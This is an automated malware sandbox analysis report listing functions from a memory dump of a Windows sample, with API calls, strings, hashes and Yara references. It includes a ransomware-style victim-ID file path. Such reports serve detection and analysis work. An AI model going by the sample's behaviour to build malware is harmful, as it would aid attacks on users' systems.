                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                                                                                        • Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                                                                                                                                                        • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 00412806
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00412814
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041281F
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                                                                                        • Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                                                                                                                                                        • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: c3bd0c51cb779beeb0a9775a21199764848d1e51d0c53401b1542843ed6001c9
                                                                                                                                                                                                                                        • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3bd0c51cb779beeb0a9775a21199764848d1e51d0c53401b1542843ed6001c9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                                                                                                                                                        • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                                                                                                        • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: e0fa685548146d3dd02f1ec3174b9dc710b3be84cbb919d47e0838b50276ea31
                                                                                                                                                                                                                                        • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0fa685548146d3dd02f1ec3174b9dc710b3be84cbb919d47e0838b50276ea31
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                                                                                                        • API String ID: 0-565200744
                                                                                                                                                                                                                                        • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                                                        • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                                                                                                                                                        • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                        • String ID: 8Q
                                                                                                                                                                                                                                        • API String ID: 3761405300-2096853525
                                                                                                                                                                                                                                        • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                                                        • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                                                                                                                                                          • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00413C83
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                                                                                                                                                        • Opcode ID: 18a6e95ac5c1231b3021f6a558c1153667619e94c9f198a37c01ca2d81c11676
                                                                                                                                                                                                                                        • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18a6e95ac5c1231b3021f6a558c1153667619e94c9f198a37c01ca2d81c11676
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                                                                                        • Opcode ID: f3c4cccd2fdfb0a1f5c5730547825dc06ecbeefcb3bb1e5a716d7bbb17428844
                                                                                                                                                                                                                                        • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3c4cccd2fdfb0a1f5c5730547825dc06ecbeefcb3bb1e5a716d7bbb17428844
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                                                                                                        • API String ID: 3494438863-969893948
                                                                                                                                                                                                                                        • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                                                                                                                        • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00480686
                                                                                                                                                                                                                                          • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                                                                                        • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                                                        • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%